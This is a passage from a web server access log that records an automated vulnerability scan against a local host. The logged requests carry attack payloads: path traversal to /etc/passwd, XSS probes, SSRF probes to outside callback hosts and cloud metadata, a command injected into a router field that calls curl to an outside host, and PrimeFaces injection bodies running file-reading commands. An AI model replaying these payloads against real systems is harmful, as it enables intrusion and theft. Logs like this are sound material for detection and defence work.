Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dbaas_monitor/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5chttp://127.0.0.1example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users/sign_in HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../example.com HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /documentation/login HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.988","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.gitignore HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.213","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apc/apc.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.214","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/.gitignore HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apc.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/.gitignore HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /./../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.218","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/mc4wp-debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.003","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.224","http_user_agent":"Nacos-Server", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dns-query?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /proxy.stream?origin=http://c9v8hn0smpv8c57g0t008m3s8cdq3estj.oast.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?c=../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PRESENTATION/HTML/TOP/PRTINFO.HTML HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /badging/badge_print_v0.php?tpl=../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitecore/admin/login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-includes/rss-functions.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/common/login/webLogin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmlrpc.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.214","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /www/delivery/afr.php?refresh=10000&\x22)',10000000);alert(1337);setTimeout('alert(\x22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/cam_portal.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename=&offset=1&count=1000&sortorder=&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=&sortitem=&filter= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.210","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dokuwiki/doku.php?id=wiki:welcome&at= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/login?redirect=%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%u002e/WEB-INF/web.xml HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /.%00/WEB-INF/web.xml HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.tar.z HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.001","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/System/MailConnect/host/c9v8hs0smpv8c6ag07h0tszzn5zhogfbq.oast.online/port/80/secure/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.206","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"{\x22command\x22:\x22setWanPortSt\x22,\x22proto\x22:\x22dhcp\x22,\x22port\x22:\x224\x22,\x22vlan_tagged\x22:\x221\x22,\x22vlanid\x22:\x225\x22,\x22mtu\x22:\x22; curl c9v8hn0smpv8c57g0t0057gwk63ugnejr.oast.live;\x22,\x22data\x22:\x22hi\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ztp/cgi-bin/handler HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install.php?profile=default HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plus/carbuyaction.php?dopost=return&code=../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.210","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=cat /etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/openstack/latest HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.908","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/metadata/v1.json HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.424","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=type C:\x5C\x5CWindows\x5C\x5Cwin.ini","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 